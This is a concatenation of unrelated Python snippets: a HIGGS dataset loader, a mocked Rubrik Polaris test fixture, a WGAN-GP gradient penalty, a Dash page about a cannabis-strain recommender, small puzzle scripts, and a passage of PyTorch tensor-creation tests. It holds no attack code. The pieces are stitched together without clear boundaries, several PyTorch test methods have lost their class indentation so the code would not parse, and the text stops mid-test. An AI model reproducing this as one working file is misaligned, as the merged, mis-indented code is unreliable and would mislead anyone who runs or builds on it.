# DataFrame column name; confirm no caller relies on it before fixing.
FEATURES = ["lepton_pT", "lepton_eta",
            "lepton phi", "missing_energy_magnitude",
            "missing_energy_phi", "jet_1_pt", "jet_1_eta",
            "jet_1_phi", "jet_1_btag", "jet_2_pt", "jet_2_eta",
            "jet_2_phi", "jet_2_btag", "jet_3_pt",
            "jet_3_eta", "jet_3_phi", "jet_3_btag",
            "jet_4_pt", "jet_4_eta", "jet_4_phi",
            "jet_4_btag", "m_jj", "m_jjj", "m_lv",
            "m_jlv", "m_bb", "m_wbb", "m_wwbb"]
def load_uci_higgs(file_name, train_test_split_seed=None):
    """Load the UCI HIGGS csv and return a stratified, shuffled
    80/20 (train, test) split of the full frame."""
    columns = ["label"] + FEATURES
    frame = pd.read_csv(file_name, names=columns, header=None)
    # stratify on the label so both splits keep the class balance
    train_df, test_df = train_test_split(
        frame, test_size=0.2, shuffle=True,
        random_state=train_test_split_seed, stratify=frame.label)
    return train_df, test_df
|
import io
import json
import pytest
from rubrik_polaris.rubrik_polaris import PolarisClient
BASE_URL = "https://rubrik-se-beta.my.rubrik.com/api"
def util_load_json(path: str) -> dict:
    """Load a json to python dict."""
    with io.open(path, mode='r', encoding='utf-8') as handle:
        return json.load(handle)
@pytest.fixture()
def client(requests_mock):
    """PolarisClient wired against a mocked /session login endpoint."""
    # the client authenticates at construction time, so the session
    # endpoint must be mocked before instantiating it
    requests_mock.post(
        BASE_URL + "/session",
        json={"access_token": "dummy", "mfa_token": "dummy_token"})
    return PolarisClient(
        domain="rubrik-se-beta",
        username="dummy_username",
        password="dummy_password",
        insecure=True,
    )
|
import torch
__author__ = 'Andres'
def calc_gradient_penalty_bayes(discriminator, real_data, fake_data, gamma):
    """WGAN-GP gradient penalty: gamma * E[(||grad D(x_hat)||_2 - 1)^2].

    x_hat is a per-sample random interpolation between real and fake data.

    Args:
        discriminator: callable mapping a batch tensor to critic scores.
        real_data: real batch, shape (batch, C, H, W).
        fake_data: fake batch, same shape as real_data.
        gamma: penalty weight.

    Returns:
        Scalar tensor with the penalty term.
    """
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    batch_size = real_data.size()[0]

    # one interpolation coefficient per sample, broadcast over the remaining dims
    alpha = torch.rand(batch_size, 1, 1, 1)
    alpha = alpha.expand(real_data.size()).to(device)

    interpolates = alpha * real_data + ((1 - alpha) * fake_data)
    # torch.autograd.Variable is deprecated; requires_grad_() marks the
    # tensor for gradient tracking in-place
    interpolates = interpolates.to(device).requires_grad_(True)

    disc_interpolates = discriminator(interpolates)

    gradients = torch.autograd.grad(
            outputs=disc_interpolates, inputs=interpolates,
            grad_outputs=torch.ones(disc_interpolates.size()).to(device),
            create_graph=True, retain_graph=True, only_inputs=True)[0]

    # bugfix: the WGAN-GP penalty is defined per sample -- flatten each
    # sample's gradient, take its 2-norm, then average over the batch.
    # The previous code took a single norm over the whole batch tensor.
    per_sample_norm = gradients.view(batch_size, -1).norm(2, dim=1)
    gradient_penalty = ((per_sample_norm - 1) ** 2).mean() * gamma
    return gradient_penalty
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
# 1 column layout
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
# Left column: write-up of the modelling process plus a k-NN illustration.
column1 = dbc.Col(
    [
        dcc.Markdown(
            """
            # Process
            Our team had four days to create a model that can take a user's input (in this case, medical cannabis preferences)
            and output the strain(s) that best match, as well as create a website for hosting our creation.
            ### Natural Language Processing:
            Machines cannot analyze raw text on their own, so we performed tokenization which is a task in Natural Language Processing (NLP).
            This method allows us to convert columns that are just text (descriptions of
            effects, ailments, taste) into numeric values that can be used for machine learning.
            """
        ),
        # Diagram referenced by the k-NN explanation in column2 below.
        html.Img(src='assets/nearest_neighbor_ex.png',
                 title="nearest neighbor example, image from wiki",
                 style={'display':'block',
                        'width':'40%',
                        'margin':'auto'})
    ],
    style={'margin':'20px'},
)
# Second section: prose explanation of the k-nearest-neighbors model.
column2 = dbc.Row(
    [
        dcc.Markdown(
            """
            ### Nearest Neighbor:
            Our team decided the best model to use for the task was the "k-nearest neighbors" algorithm. K-nearest neighbors
            puts all the data
            you're looking for onto a plane, with the recommendation you are searching for as points (in this case, the names of
            medicinal cannabis strains). For an example, if you want a hybrid strain known for helping to cure insomnia,
            with an earthy flavor, there might not be a recommendation that is spot on, so with k-nearest neighbors, our model will
            find a point that is between the closest spreads of points, and pick the one with the most points
            in that area to output a recommendation.
            In the diagram above, we are trying to classify the green circle.
            Within the inner circle, there are two red triangles and one blue square.
            K-nearest neighbors would classify the green circle as similar to the red
            triangle.
            """
        ),
    ],
    style={'margin':'20px'},
)
# Third section: note on the Google-Maps-backed "Locate" page.
column3 = dbc.Row(
    [
        dcc.Markdown(
            """
            ### Google API:
            For a stretch goal, our team decided to add a Locate page that would show the dispensaries nearest
            to a user's location. We decided on using Google Maps API for this task. When someone is
            using our webpage, they can refer to the Locate tab to find the closest dispensary near them.
            """
        ),
    ],
    style={'margin':'20px'},
)
# Decorative full-width image at the bottom of the page.
img = html.Img(src='assets/pipe_left_crop.jpeg',
               title="18th century pipe, images courtesy of metmuseum.org",
               style={'width':'99%',
                      'display':'block',
                      'margin':'20px'})
# Page layout object; presumably picked up by the app's router — confirm.
layout = dbc.Row([column1, column2, column3, img])
import hashlib


def find_min_suffix(secret, prefix='000000'):
    """Return the smallest positive integer n such that the MD5 hex digest of
    ``secret + str(n)`` starts with *prefix* (Advent of Code 2015, day 4).

    The original script was Python 2 (`print` statement, md5 of a str);
    this version encodes the input for Python 3's hashlib and drops the
    per-iteration progress printing.
    """
    number = 1
    while not hashlib.md5((secret + str(number)).encode()).hexdigest().startswith(prefix):
        number += 1
    return number


if __name__ == '__main__':
    with open('data/day4.txt') as f:
        # strip(): puzzle input files usually end with a newline, which must
        # not become part of the hashed secret.
        secret = f.read().strip()
    print('Solution: {0}'.format(find_min_suffix(secret)))
|
def prime(num):
    """Return True if ``num`` is prime, False otherwise.

    Fixes of the original: numbers below 2 (0, 1, negatives) wrongly fell
    through to the ``while``'s ``else`` and returned True; composites
    returned an implicit None instead of False; the unused ``flag`` local
    is removed.  Trial division runs up to sqrt(num).
    """
    if num < 2:
        return False
    counter = 2
    while counter <= num ** 0.5:
        if num % counter == 0:
            return False
        counter += 1
    return True
def sum_of_primes(num):
    """Sum every prime strictly below ``num`` (primality via prime())."""
    return sum(candidate for candidate in range(2, num) if prime(candidate))
# Project Euler #10 style: print the sum of all primes below two million.
# NOTE(review): trial division up to 2e6 is slow here; a sieve would be
# dramatically faster.
a = sum_of_primes(2000000)
print(a)
|
import warnings
import unittest
from itertools import product
import random
import torch
from torch.testing._internal.common_utils import \
(TestCase, run_tests, do_test_empty_full, TEST_NUMPY, suppress_warnings,
IS_WINDOWS, torch_to_numpy_dtype_dict, slowTest)
from torch.testing._internal.common_device_type import \
(instantiate_device_type_tests, deviceCountAtLeast, onlyOnCPUAndCUDA,
onlyCPU, skipCUDAIfNotRocm, largeCUDATensorTest, precisionOverride, dtypes,
onlyCUDA, skipCPUIf, dtypesIfCUDA)
if TEST_NUMPY:
import numpy as np
# Test suite for tensor creation ops
#
# Includes creation functions like torch.eye, random creation functions like
# torch.rand, and *like functions like torch.ones_like.
# DOES NOT INCLUDE view ops, which are tested in TestViewOps (currently in
# test_torch.py) OR numpy interop (which is also still tested in test_torch.py)
#
# See https://pytorch.org/docs/master/torch.html#creation-ops
class TestTensorCreation(TestCase):
exact_dtype = True
# TODO: this test should be updated
    @onlyOnCPUAndCUDA
    def test_empty_full(self, device):
        """Run the shared empty/full checker over all math dtypes for this
        device; on CUDA also exercise the device=None path (presumably the
        current-device default — confirm)."""
        torch_device = torch.device(device)
        device_type = torch_device.type
        if device_type == 'cpu':
            do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, torch_device)
        if device_type == 'cuda':
            do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, None)
            do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, torch_device)
# TODO: this test should be updated
    @suppress_warnings
    @onlyOnCPUAndCUDA
    @deviceCountAtLeast(1)
    def test_tensor_device(self, devices):
        """Check the .device reported by tensors created via torch.tensor,
        torch.ones and Tensor.cuda, for CPU and every visible CUDA device."""
        device_type = torch.device(devices[0]).type
        if device_type == 'cpu':
            self.assertEqual('cpu', torch.tensor(5).device.type)
            self.assertEqual('cpu',
                             torch.ones((2, 3), dtype=torch.float32, device='cpu').device.type)
            # 'cpu:0' is accepted and reported as device type 'cpu'.
            self.assertEqual('cpu',
                             torch.ones((2, 3), dtype=torch.float32, device='cpu:0').device.type)
            self.assertEqual('cpu',
                             torch.tensor(torch.ones((2, 3), dtype=torch.float32), device='cpu:0').device.type)
            if TEST_NUMPY:
                self.assertEqual('cpu', torch.tensor(np.random.randn(2, 3), device='cpu').device.type)
        if device_type == 'cuda':
            self.assertEqual('cuda:0', str(torch.tensor(5).cuda(0).device))
            self.assertEqual('cuda:0', str(torch.tensor(5).cuda('cuda:0').device))
            self.assertEqual('cuda:0',
                             str(torch.tensor(5, dtype=torch.int64, device=0).device))
            self.assertEqual('cuda:0',
                             str(torch.tensor(5, dtype=torch.int64, device='cuda:0').device))
            self.assertEqual('cuda:0',
                             str(torch.tensor(torch.ones((2, 3), dtype=torch.float32), device='cuda:0').device))
            if TEST_NUMPY:
                self.assertEqual('cuda:0', str(torch.tensor(np.random.randn(2, 3), device='cuda:0').device))
            # Bare 'cuda' resolves to whatever device is current at call time.
            for device in devices:
                with torch.cuda.device(device):
                    device_string = 'cuda:' + str(torch.cuda.current_device())
                    self.assertEqual(device_string,
                                     str(torch.tensor(5, dtype=torch.int64, device='cuda').device))
            # Moving to the CPU via .cuda(...) is invalid and must raise.
            with self.assertRaises(RuntimeError):
                torch.tensor(5).cuda('cpu')
            with self.assertRaises(RuntimeError):
                torch.tensor(5).cuda('cpu:0')
            if len(devices) > 1:
                self.assertEqual('cuda:1', str(torch.tensor(5).cuda(1).device))
                self.assertEqual('cuda:1', str(torch.tensor(5).cuda('cuda:1').device))
                self.assertEqual('cuda:1',
                                 str(torch.tensor(5, dtype=torch.int64, device=1).device))
                self.assertEqual('cuda:1',
                                 str(torch.tensor(5, dtype=torch.int64, device='cuda:1').device))
                self.assertEqual('cuda:1',
                                 str(torch.tensor(torch.ones((2, 3), dtype=torch.float32),
                                                  device='cuda:1').device))
                if TEST_NUMPY:
                    self.assertEqual('cuda:1',
                                     str(torch.tensor(np.random.randn(2, 3), device='cuda:1').device))
# TODO: this test should be updated
@onlyOnCPUAndCUDA
def test_as_strided_neg(self, device):
error = r'as_strided: Negative strides are not supported at the ' \
r'moment, got strides: \[-?[0-9]+(, -?[0-9]+)*\]'
with self.assertRaisesRegex(RuntimeError, error):
torch.as_strided(torch.ones(3, 3, device=device), (1, 1), (2, -1))
with self.assertRaisesRegex(RuntimeError, error):
torch.as_strided(torch.ones(14, device=device), (2,), (-11,))
# TODO: this test should be updated
def test_zeros(self, device):
res1 = torch.zeros(100, 100, device=device)
res2 = torch.tensor((), device=device)
torch.zeros(100, 100, device=device, out=res2)
self.assertEqual(res1, res2)
boolTensor = torch.zeros(2, 2, device=device, dtype=torch.bool)
expected = torch.tensor([[False, False], [False, False]],
device=device, dtype=torch.bool)
self.assertEqual(boolTensor, expected)
halfTensor = torch.zeros(1, 1, device=device, dtype=torch.half)
expected = torch.tensor([[0.]], device=device, dtype=torch.float16)
self.assertEqual(halfTensor, expected)
bfloat16Tensor = torch.zeros(1, 1, device=device, dtype=torch.bfloat16)
expected = torch.tensor([[0.]], device=device, dtype=torch.bfloat16)
self.assertEqual(bfloat16Tensor, expected)
complexTensor = torch.zeros(2, 2, device=device, dtype=torch.complex64)
expected = torch.tensor([[0., 0.], [0., 0.]], device=device, dtype=torch.complex64)
self.assertEqual(complexTensor, expected)
# TODO: this test should be updated
    def test_zeros_out(self, device):
        """torch.zeros(out=...): requesting a different dtype or layout through
        out= is an error, while a matching (or default) dtype/layout reuses
        the provided tensor."""
        shape = (3, 4)
        out = torch.zeros(shape, device=device)
        torch.zeros(shape, device=device, out=out)
        # change the dtype, layout, device
        with self.assertRaises(RuntimeError):
            torch.zeros(shape, device=device, dtype=torch.int64, out=out)
        with self.assertRaises(RuntimeError):
            torch.zeros(shape, device=device, layout=torch.sparse_coo, out=out)
        # leave them the same
        self.assertEqual(torch.zeros(shape, device=device),
                         torch.zeros(shape, device=device, dtype=out.dtype, out=out))
        self.assertEqual(torch.zeros(shape, device=device),
                         torch.zeros(shape, device=device, layout=torch.strided, out=out))
        self.assertEqual(torch.zeros(shape, device=device),
                         torch.zeros(shape, device=device, out=out))
# TODO: this test should be updated
def test_ones(self, device):
res1 = torch.ones(100, 100, device=device)
res2 = torch.tensor((), device=device)
torch.ones(100, 100, device=device, out=res2)
self.assertEqual(res1, res2)
# test boolean tensor
res1 = torch.ones(1, 2, device=device, dtype=torch.bool)
expected = torch.tensor([[True, True]], device=device, dtype=torch.bool)
self.assertEqual(res1, expected)
# TODO: this test should be updated
    @onlyCPU
    def test_constructor_dtypes(self, device):
        """Legacy tensor-type constructors: dtype attributes, and how
        set_default_tensor_type / set_default_dtype change the global
        defaults.  Mutates (and restores) global default state, so the
        statement order matters."""
        default_type = torch.Tensor().type()
        self.assertIs(torch.Tensor().dtype, torch.get_default_dtype())
        self.assertIs(torch.uint8, torch.ByteTensor.dtype)
        self.assertIs(torch.float32, torch.FloatTensor.dtype)
        self.assertIs(torch.float64, torch.DoubleTensor.dtype)
        torch.set_default_tensor_type('torch.FloatTensor')
        self.assertIs(torch.float32, torch.get_default_dtype())
        self.assertIs(torch.FloatStorage, torch.Storage)
        torch.set_default_dtype(torch.float64)
        self.assertIs(torch.float64, torch.get_default_dtype())
        self.assertIs(torch.DoubleStorage, torch.Storage)
        torch.set_default_tensor_type(torch.FloatTensor)
        self.assertIs(torch.float32, torch.get_default_dtype())
        self.assertIs(torch.FloatStorage, torch.Storage)
        if torch.cuda.is_available():
            torch.set_default_tensor_type(torch.cuda.FloatTensor)
            self.assertIs(torch.float32, torch.get_default_dtype())
            self.assertIs(torch.float32, torch.cuda.FloatTensor.dtype)
            self.assertIs(torch.cuda.FloatStorage, torch.Storage)
            torch.set_default_dtype(torch.float64)
            self.assertIs(torch.float64, torch.get_default_dtype())
            self.assertIs(torch.cuda.DoubleStorage, torch.Storage)
        # don't support integral or sparse default types.
        self.assertRaises(TypeError, lambda: torch.set_default_tensor_type('torch.IntTensor'))
        self.assertRaises(TypeError, lambda: torch.set_default_dtype(torch.int64))
        # don't allow passing dtype to set_default_tensor_type
        self.assertRaises(TypeError, lambda: torch.set_default_tensor_type(torch.float32))
        # Restore the default saved at the top so later tests are unaffected.
        torch.set_default_tensor_type(default_type)
# TODO: this test should be updated
    @onlyCPU
    def test_constructor_device_legacy(self, device):
        """Legacy constructors (torch.*Tensor, torch.Tensor, Tensor.new) must
        reject a device= argument that contradicts their fixed device."""
        self.assertRaises(RuntimeError, lambda: torch.FloatTensor(device='cuda'))
        self.assertRaises(RuntimeError, lambda: torch.FloatTensor(torch.Size([2, 3, 4]), device='cuda'))
        self.assertRaises(RuntimeError, lambda: torch.FloatTensor((2.0, 3.0), device='cuda'))
        self.assertRaises(RuntimeError, lambda: torch.Tensor(device='cuda'))
        self.assertRaises(RuntimeError, lambda: torch.Tensor(torch.Size([2, 3, 4]), device='cuda'))
        self.assertRaises(RuntimeError, lambda: torch.Tensor((2.0, 3.0), device='cuda'))
        x = torch.randn((3,), device='cpu')
        self.assertRaises(RuntimeError, lambda: x.new(device='cuda'))
        self.assertRaises(RuntimeError, lambda: x.new(torch.Size([2, 3, 4]), device='cuda'))
        self.assertRaises(RuntimeError, lambda: x.new((2.0, 3.0), device='cuda'))
        if torch.cuda.is_available():
            self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor(device='cpu'))
            self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor(torch.Size([2, 3, 4]), device='cpu'))
            self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor((2.0, 3.0), device='cpu'))
            default_type = torch.Tensor().type()
            torch.set_default_tensor_type(torch.cuda.FloatTensor)
            self.assertRaises(RuntimeError, lambda: torch.Tensor(device='cpu'))
            self.assertRaises(RuntimeError, lambda: torch.Tensor(torch.Size([2, 3, 4]), device='cpu'))
            self.assertRaises(RuntimeError, lambda: torch.Tensor((2.0, 3.0), device='cpu'))
            # NOTE(review): set_default_tensor_type(torch.cuda.FloatTensor) is
            # called a second time here before restoring; looks redundant — confirm.
            torch.set_default_tensor_type(torch.cuda.FloatTensor)
            torch.set_default_tensor_type(default_type)
            x = torch.randn((3,), device='cuda')
            self.assertRaises(RuntimeError, lambda: x.new(device='cpu'))
            self.assertRaises(RuntimeError, lambda: x.new(torch.Size([2, 3, 4]), device='cpu'))
            self.assertRaises(RuntimeError, lambda: x.new((2.0, 3.0), device='cpu'))
# TODO: this test should be updated
    @suppress_warnings
    @onlyCPU
    def test_tensor_factory(self, device):
        """torch.tensor(): construction from lists, copy semantics from other
        tensors/numpy arrays, and bool coercion of numeric/complex values."""
        # TODO: This test probably doesn't make too much sense now that
        # torch.tensor has been established for a while; it makes more
        # sense to test the legacy behavior in terms of the new behavior
        expected = torch.Tensor([1, 1])
        # test data
        res1 = torch.tensor([1, 1])
        self.assertEqual(res1, expected, exact_dtype=False)
        res1 = torch.tensor([1, 1], dtype=torch.int)
        self.assertEqual(res1, expected, exact_dtype=False)
        self.assertIs(torch.int, res1.dtype)
        # test copy
        res2 = torch.tensor(expected)
        self.assertEqual(res2, expected)
        res2[1] = 2
        # Mutating the copy must not touch the source tensor.
        self.assertEqual(expected, torch.ones_like(expected))
        res2 = torch.tensor(expected, dtype=torch.int)
        # NOTE(review): this re-checks res1, not the res2 just created above —
        # looks like a copy-paste slip; confirm it should assert on res2.
        self.assertEqual(res1, expected, exact_dtype=False)
        self.assertIs(torch.int, res1.dtype)
        # test copy with numpy
        if TEST_NUMPY:
            for dtype in [np.float64, np.int64, np.int8, np.uint8]:
                a = np.array([5.]).astype(dtype)
                res1 = torch.tensor(a)
                self.assertEqual(5., res1[0].item())
                a[0] = 7.
                # torch.tensor copies, so the numpy write is not visible.
                self.assertEqual(5., res1[0].item())
        # test boolean tensor
        a = torch.tensor([True, True, False, True, True], dtype=torch.bool)
        b = torch.tensor([-1, -1.1, 0, 1, 1.1], dtype=torch.bool)
        self.assertEqual(a, b)
        c = torch.tensor([-0.1, -1.1, 0, 1, 0.1], dtype=torch.bool)
        self.assertEqual(a, c)
        d = torch.tensor((-.3, 0, .3, 1, 3 / 7), dtype=torch.bool)
        e = torch.tensor((True, False, True, True, True), dtype=torch.bool)
        self.assertEqual(e, d)
        f = torch.tensor((-1, 0, -1.1, 1, 1.1), dtype=torch.bool)
        self.assertEqual(e, f)
        # Extreme / overflowing values still coerce to bool by truthiness.
        int64_max = torch.iinfo(torch.int64).max
        int64_min = torch.iinfo(torch.int64).min
        float64_max = torch.finfo(torch.float64).max
        float64_min = torch.finfo(torch.float64).min
        g_1 = torch.tensor((float('nan'), 0, int64_min, int64_max, int64_min - 1), dtype=torch.bool)
        self.assertEqual(e, g_1)
        g_2 = torch.tensor((int64_max + 1, 0, (int64_max + 1) * 2, (int64_max + 1) * 2 + 1, float64_min), dtype=torch.bool)
        self.assertEqual(e, g_2)
        g_3 = torch.tensor((float64_max, 0, float64_max + 1, float64_min - 1, float64_max + 1e291), dtype=torch.bool)
        self.assertEqual(e, g_3)
        h = torch.tensor([True, False, False, True, False, True, True], dtype=torch.bool)
        i = torch.tensor([1e-323, 1e-324, 0j, 1e-323j, 1e-324j, 1 + 2j, -1j], dtype=torch.bool)
        self.assertEqual(h, i)
        j = torch.tensor((True, True, True, True), dtype=torch.bool)
        k = torch.tensor((1e323, -1e323, float('inf'), -float('inf')), dtype=torch.bool)
        self.assertEqual(j, k)
# TODO: this test should be updated
    @suppress_warnings
    @onlyCPU
    def test_tensor_factory_copy_var(self, device):
        """Copy vs. alias semantics of torch.tensor / new_tensor / as_tensor
        when the source is an autograd Variable."""
        def check_copy(copy, is_leaf, requires_grad, data_ptr=None):
            if data_ptr is None:
                data_ptr = copy.data_ptr
            self.assertEqual(copy, source, exact_dtype=False)
            self.assertTrue(copy.is_leaf == is_leaf)
            self.assertTrue(copy.requires_grad == requires_grad)
            # NOTE(review): data_ptr is a bound method here, not a value —
            # this compares method objects, which is only meaningful for the
            # as_tensor alias case; probably should be data_ptr(). Confirm.
            self.assertTrue(copy.data_ptr == data_ptr)
        source = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
        # test torch.tensor()
        check_copy(torch.tensor(source), True, False)
        check_copy(torch.tensor(source, requires_grad=False), True, False)
        check_copy(torch.tensor(source, requires_grad=True), True, True)
        # test tensor.new_tensor()
        copy = torch.randn(1)
        check_copy(copy.new_tensor(source), True, False)
        check_copy(copy.new_tensor(source, requires_grad=False), True, False)
        check_copy(copy.new_tensor(source, requires_grad=True), True, True)
        # test torch.as_tensor()
        check_copy(torch.as_tensor(source), source.is_leaf, source.requires_grad, source.data_ptr)  # not copy
        check_copy(torch.as_tensor(source, dtype=torch.float), False, True)  # copy and keep the graph
# TODO: this test should be updated
    @onlyCPU
    def test_tensor_factory_type_inference(self, device):
        """Dtype inference of torch.tensor for python scalars, nested lists,
        complex values and numpy scalars, under float32 and float64 defaults."""
        def test_inference(default_dtype):
            saved_dtype = torch.get_default_dtype()
            torch.set_default_dtype(default_dtype)
            default_complex_dtype = torch.complex64 if default_dtype == torch.float32 else torch.complex128
            self.assertIs(default_dtype, torch.tensor(()).dtype)
            self.assertIs(default_dtype, torch.tensor(5.).dtype)
            self.assertIs(torch.int64, torch.tensor(5).dtype)
            self.assertIs(torch.bool, torch.tensor(True).dtype)
            self.assertIs(torch.int32, torch.tensor(5, dtype=torch.int32).dtype)
            self.assertIs(default_dtype, torch.tensor(((7, 5), (9, 5.))).dtype)
            self.assertIs(default_dtype, torch.tensor(((5., 5), (3, 5))).dtype)
            self.assertIs(torch.int64, torch.tensor(((5, 3), (3, 5))).dtype)
            self.assertIs(default_complex_dtype, torch.tensor(((5, 3 + 2j), (3, 5 + 4j))).dtype)
            if TEST_NUMPY:
                # numpy inputs keep their numpy dtype rather than the default.
                self.assertIs(torch.float64, torch.tensor(np.array(())).dtype)
                self.assertIs(torch.float64, torch.tensor(np.array(5.)).dtype)
                if np.array(5).dtype == np.int64:  # np long, which can be 4 bytes (e.g. on windows)
                    self.assertIs(torch.int64, torch.tensor(np.array(5)).dtype)
                else:
                    self.assertIs(torch.int32, torch.tensor(np.array(5)).dtype)
                self.assertIs(torch.uint8, torch.tensor(np.array(3, dtype=np.uint8)).dtype)
                self.assertIs(default_dtype, torch.tensor(((7, np.array(5)), (np.array(9), 5.))).dtype)
                self.assertIs(torch.float64, torch.tensor(((7, 5), (9, np.array(5.)))).dtype)
                self.assertIs(torch.int64, torch.tensor(((5, np.array(3)), (np.array(3), 5))).dtype)
            # Always restore the global default dtype.
            torch.set_default_dtype(saved_dtype)
        test_inference(torch.float64)
        test_inference(torch.float32)
# TODO: this test should be updated
    @suppress_warnings
    @onlyCPU
    def test_new_tensor(self, device):
        """Tensor.new_tensor: data/copy semantics, dtype override, and device
        placement when the source tensor lives on a secondary GPU."""
        expected = torch.autograd.Variable(torch.ByteTensor([1, 1]))
        # test data
        res1 = expected.new_tensor([1, 1])
        self.assertEqual(res1, expected)
        res1 = expected.new_tensor([1, 1], dtype=torch.int)
        self.assertEqual(res1, expected, exact_dtype=False)
        self.assertIs(torch.int, res1.dtype)
        # test copy
        res2 = expected.new_tensor(expected)
        self.assertEqual(res2, expected)
        res2[1] = 2
        # new_tensor copies, so the source stays all ones.
        self.assertEqual(expected, torch.ones_like(expected))
        res2 = expected.new_tensor(expected, dtype=torch.int)
        self.assertEqual(res2, expected, exact_dtype=False)
        self.assertIs(torch.int, res2.dtype)
        # test copy with numpy
        if TEST_NUMPY:
            a = np.array([5.])
            res1 = torch.tensor(a)
            res1 = res1.new_tensor(a)
            self.assertEqual(5., res1[0].item())
            a[0] = 7.
            self.assertEqual(5., res1[0].item())
        if torch.cuda.device_count() >= 2:
            expected = expected.cuda(1)
            res1 = expected.new_tensor([1, 1])
            self.assertEqual(res1.get_device(), expected.get_device())
            res1 = expected.new_tensor([1, 1], dtype=torch.int)
            self.assertIs(torch.int, res1.dtype)
            self.assertEqual(res1.get_device(), expected.get_device())
            res2 = expected.new_tensor(expected)
            self.assertEqual(res2.get_device(), expected.get_device())
            res2 = expected.new_tensor(expected, dtype=torch.int)
            # NOTE(review): checks res1.dtype right after creating res2 —
            # probably meant res2.dtype; confirm.
            self.assertIs(torch.int, res1.dtype)
            self.assertEqual(res2.get_device(), expected.get_device())
            res2 = expected.new_tensor(expected, dtype=torch.int, device=0)
            # NOTE(review): same here — res1 vs res2.
            self.assertIs(torch.int, res1.dtype)
            self.assertEqual(res2.get_device(), 0)
            res1 = expected.new_tensor(1)
            self.assertEqual(res1.get_device(), expected.get_device())
            res1 = expected.new_tensor(1, dtype=torch.int)
            self.assertIs(torch.int, res1.dtype)
            self.assertEqual(res1.get_device(), expected.get_device())
# TODO: this test should be updated
    @onlyCPU
    def test_as_tensor(self, device):
        """torch.as_tensor: aliasing vs. copying for python lists, tensors and
        numpy arrays, including dtype- and device-induced copies."""
        # from python data
        x = [[0, 1], [2, 3]]
        self.assertEqual(torch.tensor(x), torch.as_tensor(x))
        self.assertEqual(torch.tensor(x, dtype=torch.float32), torch.as_tensor(x, dtype=torch.float32))
        # python data with heterogeneous types
        z = [0, 'torch']
        with self.assertRaisesRegex(TypeError, "invalid data type"):
            # NOTE(review): the first call raises, so the second statement in
            # each of these with-blocks is never reached — confirm intent.
            torch.tensor(z)
            torch.as_tensor(z)
        # python data with self-referential lists
        z = [0]
        z += [z]
        with self.assertRaisesRegex(TypeError, "self-referential lists are incompatible"):
            torch.tensor(z)
            torch.as_tensor(z)
        z = [[1, 2], z]
        with self.assertRaisesRegex(TypeError, "self-referential lists are incompatible"):
            torch.tensor(z)
            torch.as_tensor(z)
        # from tensor (doesn't copy unless type is different)
        y = torch.tensor(x)
        self.assertIs(y, torch.as_tensor(y))
        self.assertIsNot(y, torch.as_tensor(y, dtype=torch.float32))
        if torch.cuda.is_available():
            self.assertIsNot(y, torch.as_tensor(y, device='cuda'))
            y_cuda = y.to('cuda')
            self.assertIs(y_cuda, torch.as_tensor(y_cuda))
            self.assertIs(y_cuda, torch.as_tensor(y_cuda, device='cuda'))
        if TEST_NUMPY:
            # doesn't copy
            for dtype in [np.float64, np.int64, np.int8, np.uint8]:
                n = np.random.rand(5, 6).astype(dtype)
                n_astensor = torch.as_tensor(n)
                self.assertEqual(torch.tensor(n), n_astensor)
                n_astensor[0][0] = 25.7
                # Writes through the tensor are visible in the array: shared memory.
                self.assertEqual(torch.tensor(n), n_astensor)
            # changing dtype causes copy
            n = np.random.rand(5, 6).astype(np.float32)
            n_astensor = torch.as_tensor(n, dtype=torch.float64)
            self.assertEqual(torch.tensor(n, dtype=torch.float64), n_astensor)
            n_astensor[0][1] = 250.8
            self.assertNotEqual(torch.tensor(n, dtype=torch.float64), n_astensor)
            # changing device causes copy
            if torch.cuda.is_available():
                n = np.random.randn(5, 6)
                n_astensor = torch.as_tensor(n, device='cuda')
                self.assertEqual(torch.tensor(n, device='cuda'), n_astensor)
                n_astensor[0][2] = 250.9
                self.assertNotEqual(torch.tensor(n, device='cuda'), n_astensor)
# TODO: this test should be updated
    @suppress_warnings
    def test_range(self, device):
        """Deprecated torch.range: inclusive end, out= (including a
        non-contiguous out tensor), negative step, and equal bounds."""
        res1 = torch.range(0, 1, device=device)
        res2 = torch.tensor((), device=device)
        torch.range(0, 1, device=device, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # Check range for non-contiguous tensors.
        x = torch.zeros(2, 3, device=device)
        torch.range(0, 3, device=device, out=x.narrow(1, 1, 2))
        res2 = torch.tensor(((0, 0, 1), (0, 2, 3)), device=device, dtype=torch.float32)
        self.assertEqual(x, res2, atol=1e-16, rtol=0)
        # Check negative
        res1 = torch.tensor((1, 0), device=device, dtype=torch.float32)
        res2 = torch.tensor((), device=device)
        torch.range(1, 0, -1, device=device, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        # Equal bounds
        res1 = torch.ones(1, device=device)
        res2 = torch.tensor((), device=device)
        torch.range(1, 1, -1, device=device, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
        torch.range(1, 1, 1, device=device, out=res2)
        self.assertEqual(res1, res2, atol=0, rtol=0)
# TODO: this test should be updated
def test_range_warning(self, device):
with warnings.catch_warnings(record=True) as w:
torch.range(0, 10, device=device)
self.assertEqual(len(w), 1)
# TODO: this test should be updated
    @onlyCPU
    def test_arange(self, device):
        """torch.arange: vectorized paths, out= (including non-contiguous out),
        float steps, bool endpoints, exclusive upper bound, and rejection of
        non-finite bounds."""
        res = torch.tensor(range(10000))
        res1 = torch.arange(0, 10000)  # Use a larger number so vectorized code can be triggered
        res2 = torch.tensor([], dtype=torch.int64)
        torch.arange(0, 10000, out=res2)
        self.assertEqual(res, res1, atol=0, rtol=0)
        self.assertEqual(res, res2, atol=0, rtol=0)
        # Vectorization on non-contiguous tensors
        res = torch.rand(3, 3, 300000).to(torch.int64)
        res = res.permute(2, 0, 1)
        torch.arange(0, 300000 * 3 * 3, out=res)
        self.assertEqual(res.flatten(), torch.arange(0, 300000 * 3 * 3))
        # Check arange with only one argument
